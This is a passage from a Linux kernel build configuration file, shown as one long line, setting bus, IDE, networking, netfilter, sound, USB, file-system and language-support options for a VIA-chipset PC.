CONFIG_CPU_FREQ is not set # # Bus options (PCI, PCMCIA, EISA, MCA, ISA) # CONFIG_PCI=y # CONFIG_PCI_GOBIOS is not set # CONFIG_PCI_GOMMCONFIG is not set # CONFIG_PCI_GODIRECT is not set CONFIG_PCI_GOANY=y CONFIG_PCI_BIOS=y CONFIG_PCI_DIRECT=y CONFIG_PCI_MMCONFIG=y # CONFIG_PCI_USE_VECTOR is not set CONFIG_PCI_LEGACY_PROC=y CONFIG_PCI_NAMES=y # CONFIG_ISA is not set # CONFIG_MCA is not set # CONFIG_SCx200 is not set # # PCMCIA/CardBus support # # CONFIG_PCMCIA is not set # # PCI Hotplug Support # CONFIG_HOTPLUG_PCI=y CONFIG_HOTPLUG_PCI_FAKE=y # CONFIG_HOTPLUG_PCI_COMPAQ is not set # CONFIG_HOTPLUG_PCI_IBM is not set # CONFIG_HOTPLUG_PCI_ACPI is not set # CONFIG_HOTPLUG_PCI_CPCI is not set # CONFIG_HOTPLUG_PCI_PCIE is not set # CONFIG_HOTPLUG_PCI_SHPC is not set # # Executable file formats # CONFIG_BINFMT_ELF=y CONFIG_BINFMT_AOUT=y CONFIG_BINFMT_MISC=y # # Device Drivers # # # Generic Driver Options # CONFIG_FW_LOADER=y # # Memory Technology Devices (MTD) # # CONFIG_MTD is not set # # Parallel port support # CONFIG_PARPORT=y CONFIG_PARPORT_PC=y CONFIG_PARPORT_PC_CML1=y # CONFIG_PARPORT_SERIAL is not set # CONFIG_PARPORT_PC_FIFO is not set # CONFIG_PARPORT_PC_SUPERIO is not set # CONFIG_PARPORT_OTHER is not set # CONFIG_PARPORT_1284 is not set # # Plug and Play support # # # Block devices # CONFIG_BLK_DEV_FD=y # CONFIG_PARIDE is not set # CONFIG_BLK_CPQ_DA is not set # CONFIG_BLK_CPQ_CISS_DA is not set # CONFIG_BLK_DEV_DAC960 is not set # CONFIG_BLK_DEV_UMEM is not set CONFIG_BLK_DEV_LOOP=y CONFIG_BLK_DEV_CRYPTOLOOP=y CONFIG_BLK_DEV_NBD=y # CONFIG_BLK_DEV_CARMEL is not set CONFIG_BLK_DEV_RAM=y CONFIG_BLK_DEV_RAM_SIZE=8192 # CONFIG_BLK_DEV_INITRD is not set CONFIG_LBD=y # # ATA/ATAPI/MFM/RLL support # CONFIG_IDE=y CONFIG_BLK_DEV_IDE=y # # Please see Documentation/ide.txt for help/info on IDE drives # # CONFIG_BLK_DEV_HD_IDE is not set CONFIG_BLK_DEV_IDEDISK=y CONFIG_IDEDISK_MULTI_MODE=y CONFIG_BLK_DEV_IDECD=y # CONFIG_BLK_DEV_IDETAPE is not set # CONFIG_BLK_DEV_IDEFLOPPY is not set # CONFIG_IDE_TASK_IOCTL is not set CONFIG_IDE_TASKFILE_IO=y # # IDE chipset support/bugfixes # CONFIG_IDE_GENERIC=y # CONFIG_BLK_DEV_CMD640 is not set CONFIG_BLK_DEV_IDEPCI=y CONFIG_IDEPCI_SHARE_IRQ=y # CONFIG_BLK_DEV_OFFBOARD is not set CONFIG_BLK_DEV_GENERIC=y # CONFIG_BLK_DEV_OPTI621 is not set # CONFIG_BLK_DEV_RZ1000 is not set CONFIG_BLK_DEV_IDEDMA_PCI=y # CONFIG_BLK_DEV_IDEDMA_FORCED is not set CONFIG_IDEDMA_PCI_AUTO=y # CONFIG_IDEDMA_ONLYDISK is not set CONFIG_BLK_DEV_ADMA=y # CONFIG_BLK_DEV_AEC62XX is not set # CONFIG_BLK_DEV_ALI15X3 is not set # CONFIG_BLK_DEV_AMD74XX is not set # CONFIG_BLK_DEV_ATIIXP is not set # CONFIG_BLK_DEV_CMD64X is not set # CONFIG_BLK_DEV_TRIFLEX is not set # CONFIG_BLK_DEV_CY82C693 is not set # CONFIG_BLK_DEV_CS5520 is not set # CONFIG_BLK_DEV_CS5530 is not set # CONFIG_BLK_DEV_HPT34X is not set # CONFIG_BLK_DEV_HPT366 is not set # CONFIG_BLK_DEV_SC1200 is not set # CONFIG_BLK_DEV_PIIX is not set # CONFIG_BLK_DEV_NS87415 is not set # CONFIG_BLK_DEV_PDC202XX_OLD is not set # CONFIG_BLK_DEV_PDC202XX_NEW is not set # CONFIG_BLK_DEV_SVWKS is not set # CONFIG_BLK_DEV_SIIMAGE is not set # CONFIG_BLK_DEV_SIS5513 is not set # CONFIG_BLK_DEV_SLC90E66 is not set # CONFIG_BLK_DEV_TRM290 is not set CONFIG_BLK_DEV_VIA82CXXX=y # CONFIG_IDE_ARM is not set CONFIG_BLK_DEV_IDEDMA=y # CONFIG_IDEDMA_IVB is not set CONFIG_IDEDMA_AUTO=y # CONFIG_BLK_DEV_HD is not set # # SCSI device support # # CONFIG_SCSI is not set # # Multi-device support (RAID and LVM) # # CONFIG_MD is not set # # Fusion MPT device support # # # IEEE 1394 (FireWire) support # # CONFIG_IEEE1394 is not set # # I2O device support # # CONFIG_I2O is not set # # Networking support # CONFIG_NET=y # # Networking options # CONFIG_PACKET=y CONFIG_PACKET_MMAP=y # CONFIG_NETLINK_DEV is not set CONFIG_UNIX=y # CONFIG_NET_KEY is not set CONFIG_INET=y CONFIG_IP_MULTICAST=y # CONFIG_IP_ADVANCED_ROUTER is not set CONFIG_IP_PNP=y CONFIG_IP_PNP_DHCP=y # CONFIG_IP_PNP_BOOTP is not set # CONFIG_IP_PNP_RARP is not set CONFIG_NET_IPIP=y # CONFIG_NET_IPGRE is not set # CONFIG_IP_MROUTE is not set # CONFIG_ARPD is not set # CONFIG_SYN_COOKIES is not set # CONFIG_INET_AH is not set # CONFIG_INET_ESP is not set # CONFIG_INET_IPCOMP is not set # # IP: Virtual Server Configuration # # CONFIG_IP_VS is not set CONFIG_IPV6=y # CONFIG_IPV6_PRIVACY is not set # CONFIG_INET6_AH is not set # CONFIG_INET6_ESP is not set # CONFIG_INET6_IPCOMP is not set CONFIG_IPV6_TUNNEL=y CONFIG_NETFILTER=y # CONFIG_NETFILTER_DEBUG is not set # # IP: Netfilter Configuration # CONFIG_IP_NF_CONNTRACK=y # CONFIG_IP_NF_FTP is not set # CONFIG_IP_NF_IRC is not set # CONFIG_IP_NF_TFTP is not set # CONFIG_IP_NF_AMANDA is not set # CONFIG_IP_NF_QUEUE is not set CONFIG_IP_NF_IPTABLES=y # CONFIG_IP_NF_MATCH_LIMIT is not set # CONFIG_IP_NF_MATCH_IPRANGE is not set # CONFIG_IP_NF_MATCH_MAC is not set # CONFIG_IP_NF_MATCH_PKTTYPE is not set # CONFIG_IP_NF_MATCH_MARK is not set # CONFIG_IP_NF_MATCH_MULTIPORT is not set # CONFIG_IP_NF_MATCH_TOS is not set # CONFIG_IP_NF_MATCH_RECENT is not set # CONFIG_IP_NF_MATCH_ECN is not set # CONFIG_IP_NF_MATCH_DSCP is not set # CONFIG_IP_NF_MATCH_AH_ESP is not set # CONFIG_IP_NF_MATCH_LENGTH is not set # CONFIG_IP_NF_MATCH_TTL is not set # CONFIG_IP_NF_MATCH_TCPMSS is not set # CONFIG_IP_NF_MATCH_HELPER is not set # CONFIG_IP_NF_MATCH_STATE is not set # CONFIG_IP_NF_MATCH_CONNTRACK is not set # CONFIG_IP_NF_MATCH_OWNER is not set CONFIG_IP_NF_FILTER=y # CONFIG_IP_NF_TARGET_REJECT is not set CONFIG_IP_NF_NAT=y CONFIG_IP_NF_NAT_NEEDED=y CONFIG_IP_NF_TARGET_MASQUERADE=y CONFIG_IP_NF_TARGET_REDIRECT=y # CONFIG_IP_NF_TARGET_NETMAP is not set # CONFIG_IP_NF_TARGET_SAME is not set CONFIG_IP_NF_NAT_LOCAL=y # CONFIG_IP_NF_NAT_SNMP_BASIC is not set # CONFIG_IP_NF_MANGLE is not set # CONFIG_IP_NF_TARGET_LOG is not set # CONFIG_IP_NF_TARGET_ULOG is not set # CONFIG_IP_NF_TARGET_TCPMSS is not set # CONFIG_IP_NF_ARPTABLES is not set # CONFIG_IP_NF_RAW is not set # # IPv6: Netfilter Configuration # # CONFIG_IP6_NF_QUEUE is not set # CONFIG_IP6_NF_IPTABLES is not set CONFIG_XFRM=y # CONFIG_XFRM_USER is not set # # SCTP Configuration (EXPERIMENTAL) # # CONFIG_IP_SCTP is not set # CONFIG_ATM is not set # CONFIG_BRIDGE is not set # CONFIG_VLAN_8021Q is not set # CONFIG_DECNET is not set CONFIG_LLC=y # CONFIG_LLC2 is not set CONFIG_IPX=y CONFIG_IPX_INTERN=y # CONFIG_ATALK is not set # CONFIG_X25 is not set # CONFIG_LAPB is not set # CONFIG_NET_DIVERT is not set # CONFIG_ECONET is not set # CONFIG_WAN_ROUTER is not set # CONFIG_NET_FASTROUTE is not set # CONFIG_NET_HW_FLOWCONTROL is not set # # QoS and/or fair queueing # CONFIG_NET_SCHED=y # CONFIG_NET_SCH_CBQ is not set CONFIG_NET_SCH_HTB=y # CONFIG_NET_SCH_HFSC is not set # CONFIG_NET_SCH_CSZ is not set # CONFIG_NET_SCH_PRIO is not set # CONFIG_NET_SCH_RED is not set # CONFIG_NET_SCH_SFQ is not set # CONFIG_NET_SCH_TEQL is not set # CONFIG_NET_SCH_TBF is not set # CONFIG_NET_SCH_GRED is not set # CONFIG_NET_SCH_DSMARK is not set # CONFIG_NET_SCH_DELAY is not set # CONFIG_NET_SCH_INGRESS is not set CONFIG_NET_QOS=y CONFIG_NET_ESTIMATOR=y CONFIG_NET_CLS=y CONFIG_NET_CLS_TCINDEX=y CONFIG_NET_CLS_ROUTE4=y CONFIG_NET_CLS_ROUTE=y CONFIG_NET_CLS_FW=y CONFIG_NET_CLS_U32=y # CONFIG_NET_CLS_RSVP is not set # CONFIG_NET_CLS_RSVP6 is not set # CONFIG_NET_CLS_POLICE is not set # # Network testing # # CONFIG_NET_PKTGEN is not set # CONFIG_NETPOLL is not set # CONFIG_NET_POLL_CONTROLLER is not set # CONFIG_HAMRADIO is not set # CONFIG_IRDA is not set # CONFIG_BT is not set CONFIG_NETDEVICES=y # CONFIG_DUMMY is not set # CONFIG_BONDING is not set # CONFIG_EQUALIZER is not set CONFIG_TUN=y # # ARCnet devices # # CONFIG_ARCNET is not set # # Ethernet (10 or 100Mbit) # CONFIG_NET_ETHERNET=y CONFIG_MII=y # CONFIG_HAPPYMEAL is not set # CONFIG_SUNGEM is not set # CONFIG_NET_VENDOR_3COM is not set # # Tulip family network device support # # CONFIG_NET_TULIP is not set # CONFIG_HP100 is not set CONFIG_NET_PCI=y # CONFIG_PCNET32 is not set # CONFIG_AMD8111_ETH is not set # CONFIG_ADAPTEC_STARFIRE is not set # CONFIG_B44 is not set # CONFIG_FORCEDETH is not set # CONFIG_DGRS is not set # CONFIG_EEPRO100 is not set # CONFIG_E100 is not set # CONFIG_FEALNX is not set # CONFIG_NATSEMI is not set # CONFIG_NE2K_PCI is not set # CONFIG_8139CP is not set CONFIG_8139TOO=y # CONFIG_8139TOO_PIO is not set # CONFIG_8139TOO_TUNE_TWISTER is not set # CONFIG_8139TOO_8129 is not set # CONFIG_8139_OLD_RX_RESET is not set # CONFIG_SIS900 is not set # CONFIG_EPIC100 is not set # CONFIG_SUNDANCE is not set # CONFIG_TLAN is not set CONFIG_VIA_RHINE=y CONFIG_VIA_RHINE_MMIO=y # # Ethernet (1000 Mbit) # # CONFIG_ACENIC is not set # CONFIG_DL2K is not set # CONFIG_E1000 is not set # CONFIG_NS83820 is not set # CONFIG_HAMACHI is not set # CONFIG_YELLOWFIN is not set CONFIG_R8169=y # CONFIG_SK98LIN is not set CONFIG_TIGON3=y # # Ethernet (10000 Mbit) # # CONFIG_IXGB is not set # CONFIG_S2IO is not set # # Token Ring devices # # CONFIG_TR is not set # # Wireless LAN (non-hamradio) # # CONFIG_NET_RADIO is not set # # Wan interfaces # # CONFIG_WAN is not set # CONFIG_FDDI is not set # CONFIG_HIPPI is not set # CONFIG_PLIP is not set # CONFIG_PPP is not set # CONFIG_SLIP is not set # CONFIG_SHAPER is not set # CONFIG_NETCONSOLE is not set # # ISDN subsystem # # CONFIG_ISDN is not set # # Telephony Support # # CONFIG_PHONE is not set # # Input device support # CONFIG_INPUT=y # # Userland interfaces # CONFIG_INPUT_MOUSEDEV=y CONFIG_INPUT_MOUSEDEV_PSAUX=y CONFIG_INPUT_MOUSEDEV_SCREEN_X=1024 CONFIG_INPUT_MOUSEDEV_SCREEN_Y=768 CONFIG_INPUT_JOYDEV=y # CONFIG_INPUT_TSDEV is not set CONFIG_INPUT_EVDEV=y # CONFIG_INPUT_EVBUG is not set # # Input I/O drivers # CONFIG_GAMEPORT=y CONFIG_SOUND_GAMEPORT=y # CONFIG_GAMEPORT_NS558 is not set # CONFIG_GAMEPORT_L4 is not set CONFIG_GAMEPORT_EMU10K1=y # CONFIG_GAMEPORT_VORTEX is not set # CONFIG_GAMEPORT_FM801 is not set # CONFIG_GAMEPORT_CS461x is not set CONFIG_SERIO=y CONFIG_SERIO_I8042=y # CONFIG_SERIO_SERPORT is not set # CONFIG_SERIO_CT82C710 is not set # CONFIG_SERIO_PARKBD is not set # CONFIG_SERIO_PCIPS2 is not set # # Input Device Drivers # CONFIG_INPUT_KEYBOARD=y CONFIG_KEYBOARD_ATKBD=y # CONFIG_KEYBOARD_SUNKBD is not set # CONFIG_KEYBOARD_LKKBD is not set # CONFIG_KEYBOARD_XTKBD is not set # CONFIG_KEYBOARD_NEWTON is not set CONFIG_INPUT_MOUSE=y CONFIG_MOUSE_PS2=y # CONFIG_MOUSE_SERIAL is not set # CONFIG_MOUSE_VSXXXAA is not set # CONFIG_INPUT_JOYSTICK is not set # CONFIG_INPUT_TOUCHSCREEN is not set CONFIG_INPUT_MISC=y # CONFIG_INPUT_PCSPKR is not set CONFIG_INPUT_UINPUT=y # # Character devices # CONFIG_VT=y CONFIG_VT_CONSOLE=y CONFIG_HW_CONSOLE=y # CONFIG_SERIAL_NONSTANDARD is not set # # Serial drivers # CONFIG_SERIAL_8250=y # CONFIG_SERIAL_8250_CONSOLE is not set # CONFIG_SERIAL_8250_ACPI is not set CONFIG_SERIAL_8250_NR_UARTS=4 # CONFIG_SERIAL_8250_EXTENDED is not set # # Non-8250 serial port support # CONFIG_SERIAL_CORE=y CONFIG_UNIX98_PTYS=y CONFIG_LEGACY_PTYS=y CONFIG_LEGACY_PTY_COUNT=256 CONFIG_PRINTER=y # CONFIG_LP_CONSOLE is not set # CONFIG_PPDEV is not set # CONFIG_TIPAR is not set # CONFIG_QIC02_TAPE is not set # # IPMI # # CONFIG_IPMI_HANDLER is not set # # Watchdog Cards # # CONFIG_WATCHDOG is not set CONFIG_HW_RANDOM=y CONFIG_NVRAM=y CONFIG_RTC=y # CONFIG_DTLK is not set # CONFIG_R3964 is not set # CONFIG_APPLICOM is not set # CONFIG_SONYPI is not set # # Ftape, the floppy tape device driver # # CONFIG_FTAPE is not set CONFIG_AGP=y # CONFIG_AGP_ALI is not set # CONFIG_AGP_ATI is not set # CONFIG_AGP_AMD is not set # CONFIG_AGP_AMD64 is not set # CONFIG_AGP_INTEL is not set # CONFIG_AGP_INTEL_MCH is not set # CONFIG_AGP_NVIDIA is not set # CONFIG_AGP_SIS is not set # CONFIG_AGP_SWORKS is not set CONFIG_AGP_VIA=y # CONFIG_AGP_EFFICEON is not set # CONFIG_DRM is not set # CONFIG_MWAVE is not set # CONFIG_RAW_DRIVER is not set # CONFIG_HANGCHECK_TIMER is not set # # I2C support # CONFIG_I2C=y CONFIG_I2C_CHARDEV=y # # I2C Algorithms # # CONFIG_I2C_ALGOBIT is not set # CONFIG_I2C_ALGOPCF is not set # # I2C Hardware Bus support # # CONFIG_I2C_ALI1535 is not set # CONFIG_I2C_ALI1563 is not set # CONFIG_I2C_ALI15X3 is not set # CONFIG_I2C_AMD756 is not set # CONFIG_I2C_AMD8111 is not set # CONFIG_I2C_I801 is not set # CONFIG_I2C_I810 is not set # CONFIG_I2C_ISA is not set # CONFIG_I2C_NFORCE2 is not set # CONFIG_I2C_PARPORT is not set # CONFIG_I2C_PARPORT_LIGHT is not set # CONFIG_I2C_PIIX4 is not set # CONFIG_I2C_PROSAVAGE is not set # CONFIG_I2C_SAVAGE4 is not set # CONFIG_SCx200_ACB is not set # CONFIG_I2C_SIS5595 is not set # CONFIG_I2C_SIS630 is not set # CONFIG_I2C_SIS96X is not set # CONFIG_I2C_VIA is not set CONFIG_I2C_VIAPRO=y # CONFIG_I2C_VOODOO3 is not set # # Hardware Sensors Chip support # # CONFIG_I2C_SENSOR is not set # CONFIG_SENSORS_ADM1021 is not set # CONFIG_SENSORS_ASB100 is not set # CONFIG_SENSORS_DS1621 is not set # CONFIG_SENSORS_FSCHER is not set # CONFIG_SENSORS_GL518SM is not set # CONFIG_SENSORS_IT87 is not set # CONFIG_SENSORS_LM75 is not set # CONFIG_SENSORS_LM78 is not set # CONFIG_SENSORS_LM80 is not set # CONFIG_SENSORS_LM83 is not set # CONFIG_SENSORS_LM85 is not set # CONFIG_SENSORS_LM90 is not set # CONFIG_SENSORS_MAX1619 is not set # CONFIG_SENSORS_VIA686A is not set # CONFIG_SENSORS_W83781D is not set # CONFIG_SENSORS_W83L785TS is not set # CONFIG_SENSORS_W83627HF is not set # # Other I2C Chip support # # CONFIG_SENSORS_EEPROM is not set # CONFIG_SENSORS_PCF8574 is not set # CONFIG_SENSORS_PCF8591 is not set # CONFIG_SENSORS_RTC8564 is not set # CONFIG_I2C_DEBUG_CORE is not set # CONFIG_I2C_DEBUG_ALGO is not set # CONFIG_I2C_DEBUG_BUS is not set # CONFIG_I2C_DEBUG_CHIP is not set # # Misc devices # # CONFIG_IBM_ASM is not set # # Multimedia devices # CONFIG_VIDEO_DEV=y # # Video For Linux # # # Video Adapters # # CONFIG_VIDEO_BT848 is not set # CONFIG_VIDEO_BWQCAM is not set # CONFIG_VIDEO_CQCAM is not set # CONFIG_VIDEO_CPIA is not set # CONFIG_VIDEO_SAA5246A is not set # CONFIG_VIDEO_SAA5249 is not set # CONFIG_TUNER_3036 is not set # CONFIG_VIDEO_STRADIS is not set # CONFIG_VIDEO_ZORAN is not set # CONFIG_VIDEO_SAA7134 is not set # CONFIG_VIDEO_MXB is not set # CONFIG_VIDEO_DPC is not set # CONFIG_VIDEO_HEXIUM_ORION is not set # CONFIG_VIDEO_HEXIUM_GEMINI is not set # # Radio Adapters # # CONFIG_RADIO_GEMTEK_PCI is not set # CONFIG_RADIO_MAXIRADIO is not set # CONFIG_RADIO_MAESTRO is not set # # Digital Video Broadcasting Devices # CONFIG_DVB=y CONFIG_DVB_CORE=y # # Supported Frontend Modules # CONFIG_DVB_STV0299=y # CONFIG_DVB_SP887X is not set # CONFIG_DVB_ALPS_TDLB7 is not set # CONFIG_DVB_ALPS_TDMB7 is not set # CONFIG_DVB_ATMEL_AT76C651 is not set CONFIG_DVB_CX24110=y CONFIG_DVB_GRUNDIG_29504_491=y # CONFIG_DVB_GRUNDIG_29504_401 is not set CONFIG_DVB_MT312=y # CONFIG_DVB_VES1820 is not set CONFIG_DVB_VES1X93=y # CONFIG_DVB_TDA1004X is not set # CONFIG_DVB_NXT6000 is not set # # Supported SAA7146 based PCI Adapters # CONFIG_DVB_AV7110=y CONFIG_DVB_AV7110_OSD=y # CONFIG_DVB_BUDGET is not set # CONFIG_DVB_BUDGET_CI is not set # CONFIG_DVB_BUDGET_AV is not set # # Supported USB Adapters # # CONFIG_DVB_TTUSB_BUDGET is not set # CONFIG_DVB_TTUSB_DEC is not set # # Supported FlexCopII (B2C2) Adapters # # CONFIG_DVB_B2C2_SKYSTAR is not set # # Supported BT878 Adapters # CONFIG_VIDEO_SAA7146=y CONFIG_VIDEO_SAA7146_VV=y CONFIG_VIDEO_VIDEOBUF=y CONFIG_VIDEO_BUF=y # # Graphics support # CONFIG_FB=y # CONFIG_FB_PM2 is not set # CONFIG_FB_CYBER2000 is not set # CONFIG_FB_ASILIANT is not set # CONFIG_FB_IMSTT is not set # CONFIG_FB_VGA16 is not set CONFIG_FB_VESA=y CONFIG_VIDEO_SELECT=y # CONFIG_FB_HGA is not set # CONFIG_FB_RIVA is not set # CONFIG_FB_MATROX is not set # CONFIG_FB_RADEON_OLD is not set # CONFIG_FB_RADEON is not set # CONFIG_FB_ATY128 is not set # CONFIG_FB_ATY is not set # CONFIG_FB_SIS is not set # CONFIG_FB_NEOMAGIC is not set # CONFIG_FB_KYRO is not set # CONFIG_FB_3DFX is not set # CONFIG_FB_VOODOO1 is not set # CONFIG_FB_TRIDENT is not set # CONFIG_FB_VIRTUAL is not set # # Console display driver support # CONFIG_VGA_CONSOLE=y # CONFIG_MDA_CONSOLE is not set CONFIG_DUMMY_CONSOLE=y CONFIG_FRAMEBUFFER_CONSOLE=y CONFIG_PCI_CONSOLE=y CONFIG_FONTS=y # CONFIG_FONT_8x8 is not set CONFIG_FONT_8x16=y # CONFIG_FONT_6x11 is not set # CONFIG_FONT_PEARL_8x8 is not set # CONFIG_FONT_ACORN_8x8 is not set # CONFIG_FONT_MINI_4x6 is not set # CONFIG_FONT_SUN8x16 is not set # CONFIG_FONT_SUN12x22 is not set # # Logo configuration # CONFIG_LOGO=y CONFIG_LOGO_LINUX_MONO=y CONFIG_LOGO_LINUX_VGA16=y CONFIG_LOGO_LINUX_CLUT224=y # # Sound # CONFIG_SOUND=y # # Advanced Linux Sound Architecture # CONFIG_SND=y CONFIG_SND_TIMER=y CONFIG_SND_PCM=y CONFIG_SND_HWDEP=y CONFIG_SND_RAWMIDI=y CONFIG_SND_SEQUENCER=y # CONFIG_SND_SEQ_DUMMY is not set CONFIG_SND_OSSEMUL=y CONFIG_SND_MIXER_OSS=y CONFIG_SND_PCM_OSS=y CONFIG_SND_SEQUENCER_OSS=y CONFIG_SND_RTCTIMER=y # CONFIG_SND_VERBOSE_PRINTK is not set # CONFIG_SND_DEBUG is not set # # Generic devices # CONFIG_SND_MPU401_UART=y # CONFIG_SND_DUMMY is not set # CONFIG_SND_VIRMIDI is not set # CONFIG_SND_MTPAV is not set # CONFIG_SND_SERIAL_U16550 is not set # CONFIG_SND_MPU401 is not set # # PCI devices # CONFIG_SND_AC97_CODEC=y # CONFIG_SND_ALI5451 is not set # CONFIG_SND_ATIIXP is not set # CONFIG_SND_AU8810 is not set # CONFIG_SND_AU8820 is not set # CONFIG_SND_AU8830 is not set # CONFIG_SND_AZT3328 is not set # CONFIG_SND_BT87X is not set # CONFIG_SND_CS46XX is not set # CONFIG_SND_CS4281 is not set CONFIG_SND_EMU10K1=y # CONFIG_SND_KORG1212 is not set # CONFIG_SND_MIXART is not set # CONFIG_SND_NM256 is not set # CONFIG_SND_RME32 is not set # CONFIG_SND_RME96 is not set # CONFIG_SND_RME9652 is not set # CONFIG_SND_HDSP is not set # CONFIG_SND_TRIDENT is not set # CONFIG_SND_YMFPCI is not set # CONFIG_SND_ALS4000 is not set # CONFIG_SND_CMIPCI is not set # CONFIG_SND_ENS1370 is not set # CONFIG_SND_ENS1371 is not set # CONFIG_SND_ES1938 is not set # CONFIG_SND_ES1968 is not set # CONFIG_SND_MAESTRO3 is not set # CONFIG_SND_FM801 is not set # CONFIG_SND_ICE1712 is not set # CONFIG_SND_ICE1724 is not set # CONFIG_SND_INTEL8X0 is not set # CONFIG_SND_INTEL8X0M is not set # CONFIG_SND_SONICVIBES is not set CONFIG_SND_VIA82XX=y # CONFIG_SND_VX222 is not set # # ALSA USB devices # # CONFIG_SND_USB_AUDIO is not set # # Open Sound System # # CONFIG_SOUND_PRIME is not set # # USB support # CONFIG_USB=y # CONFIG_USB_DEBUG is not set # # Miscellaneous USB options # CONFIG_USB_DEVICEFS=y # CONFIG_USB_BANDWIDTH is not set # CONFIG_USB_DYNAMIC_MINORS is not set # # USB Host Controller Drivers # CONFIG_USB_EHCI_HCD=y # CONFIG_USB_EHCI_SPLIT_ISO is not set # CONFIG_USB_EHCI_ROOT_HUB_TT is not set # CONFIG_USB_OHCI_HCD is not set CONFIG_USB_UHCI_HCD=y # # USB Device Class drivers # # CONFIG_USB_AUDIO is not set # CONFIG_USB_BLUETOOTH_TTY is not set # CONFIG_USB_MIDI is not set # CONFIG_USB_ACM is not set # CONFIG_USB_PRINTER is not set # CONFIG_USB_STORAGE is not set # # USB Human Interface Devices (HID) # CONFIG_USB_HID=y CONFIG_USB_HIDINPUT=y CONFIG_HID_FF=y # CONFIG_HID_PID is not set CONFIG_LOGITECH_FF=y # CONFIG_THRUSTMASTER_FF is not set # CONFIG_USB_HIDDEV is not set # CONFIG_USB_AIPTEK is not set # CONFIG_USB_WACOM is not set # CONFIG_USB_KBTAB is not set # CONFIG_USB_POWERMATE is not set # CONFIG_USB_MTOUCH is not set # CONFIG_USB_EGALAX is not set # CONFIG_USB_XPAD is not set # CONFIG_USB_ATI_REMOTE is not set # # USB Imaging devices # # CONFIG_USB_MDC800 is not set # # USB Multimedia devices # # CONFIG_USB_DABUSB is not set # CONFIG_USB_VICAM is not set # CONFIG_USB_DSBR is not set # CONFIG_USB_IBMCAM is not set # CONFIG_USB_KONICAWC is not set # CONFIG_USB_OV511 is not set # CONFIG_USB_PWC is not set # CONFIG_USB_SE401 is not set # CONFIG_USB_STV680 is not set # CONFIG_USB_W9968CF is not set # # USB Network adaptors # # CONFIG_USB_CATC is not set # CONFIG_USB_KAWETH is not set # CONFIG_USB_PEGASUS is not set # CONFIG_USB_RTL8150 is not set # CONFIG_USB_USBNET is not set # # USB port drivers # # CONFIG_USB_USS720 is not set # # USB Serial Converter support # # CONFIG_USB_SERIAL is not set # # USB Miscellaneous drivers # # CONFIG_USB_EMI62 is not set # CONFIG_USB_EMI26 is not set # CONFIG_USB_TIGL is not set # CONFIG_USB_AUERSWALD is not set # CONFIG_USB_RIO500 is not set # CONFIG_USB_LEGOTOWER is not set # CONFIG_USB_LCD is not set # CONFIG_USB_LED is not set # CONFIG_USB_CYTHERM is not set # CONFIG_USB_PHIDGETSERVO is not set # CONFIG_USB_TEST is not set # # USB Gadget Support # # CONFIG_USB_GADGET is not set # # File systems # CONFIG_EXT2_FS=y CONFIG_EXT2_FS_XATTR=y CONFIG_EXT2_FS_POSIX_ACL=y CONFIG_EXT2_FS_SECURITY=y CONFIG_EXT3_FS=y CONFIG_EXT3_FS_XATTR=y CONFIG_EXT3_FS_POSIX_ACL=y CONFIG_EXT3_FS_SECURITY=y CONFIG_JBD=y # CONFIG_JBD_DEBUG is not set CONFIG_FS_MBCACHE=y CONFIG_REISERFS_FS=y # CONFIG_REISERFS_CHECK is not set # CONFIG_REISERFS_PROC_INFO is not set # CONFIG_REISERFS_FS_XATTR is not set # CONFIG_JFS_FS is not set CONFIG_FS_POSIX_ACL=y # CONFIG_XFS_FS is not set # CONFIG_MINIX_FS is not set # CONFIG_ROMFS_FS is not set CONFIG_QUOTA=y # CONFIG_QFMT_V1 is not set CONFIG_QFMT_V2=y CONFIG_QUOTACTL=y # CONFIG_AUTOFS_FS is not set CONFIG_AUTOFS4_FS=y # # CD-ROM/DVD Filesystems # CONFIG_ISO9660_FS=y CONFIG_JOLIET=y CONFIG_ZISOFS=y CONFIG_ZISOFS_FS=y CONFIG_UDF_FS=y # # DOS/FAT/NT Filesystems # CONFIG_FAT_FS=y CONFIG_MSDOS_FS=y CONFIG_VFAT_FS=y CONFIG_NTFS_FS=y # CONFIG_NTFS_DEBUG is not set CONFIG_NTFS_RW=y # # Pseudo filesystems # CONFIG_PROC_FS=y CONFIG_PROC_KCORE=y CONFIG_SYSFS=y CONFIG_DEVFS_FS=y CONFIG_DEVFS_MOUNT=y # CONFIG_DEVFS_DEBUG is not set CONFIG_DEVPTS_FS_XATTR=y CONFIG_DEVPTS_FS_SECURITY=y CONFIG_TMPFS=y # CONFIG_HUGETLBFS is not set # CONFIG_HUGETLB_PAGE is not set CONFIG_RAMFS=y # # Miscellaneous filesystems # # CONFIG_ADFS_FS is not set # CONFIG_AFFS_FS is not set # CONFIG_HFS_FS is not set # CONFIG_HFSPLUS_FS is not set # CONFIG_BEFS_FS is not set # CONFIG_BFS_FS is not set # CONFIG_EFS_FS is not set # CONFIG_CRAMFS is not set # CONFIG_VXFS_FS is not set # CONFIG_HPFS_FS is not set # CONFIG_QNX4FS_FS is not set # CONFIG_SYSV_FS is not set # CONFIG_UFS_FS is not set # # Network File Systems # CONFIG_NFS_FS=y CONFIG_NFS_V3=y # CONFIG_NFS_V4 is not set CONFIG_NFS_DIRECTIO=y CONFIG_NFSD=y CONFIG_NFSD_V3=y # CONFIG_NFSD_V4 is not set CONFIG_NFSD_TCP=y # CONFIG_ROOT_NFS is not set CONFIG_LOCKD=y CONFIG_LOCKD_V4=y CONFIG_EXPORTFS=y CONFIG_SUNRPC=y # CONFIG_RPCSEC_GSS_KRB5 is not set CONFIG_SMB_FS=y # CONFIG_SMB_NLS_DEFAULT is not set CONFIG_CIFS=y # CONFIG_CIFS_STATS is not set CONFIG_NCP_FS=y CONFIG_NCPFS_PACKET_SIGNING=y CONFIG_NCPFS_IOCTL_LOCKING=y CONFIG_NCPFS_STRONG=y CONFIG_NCPFS_NFS_NS=y # CONFIG_NCPFS_OS2_NS is not set # CONFIG_NCPFS_SMALLDOS is not set CONFIG_NCPFS_NLS=y CONFIG_NCPFS_EXTRAS=y CONFIG_CODA_FS=y CONFIG_CODA_FS_OLD_API=y # CONFIG_AFS_FS is not set # # Partition Types # # CONFIG_PARTITION_ADVANCED is not set CONFIG_MSDOS_PARTITION=y # # Native Language Support # CONFIG_NLS=y CONFIG_NLS_DEFAULT="iso8859-1" CONFIG_NLS_CODEPAGE_437=y CONFIG_NLS_CODEPAGE_737=y CONFIG_NLS_CODEPAGE_775=y CONFIG_NLS_CODEPAGE_850=y CONFIG_NLS_CODEPAGE_852=y CONFIG_NLS_CODEPAGE_855=y CONFIG_NLS_CODEPAGE_857=y 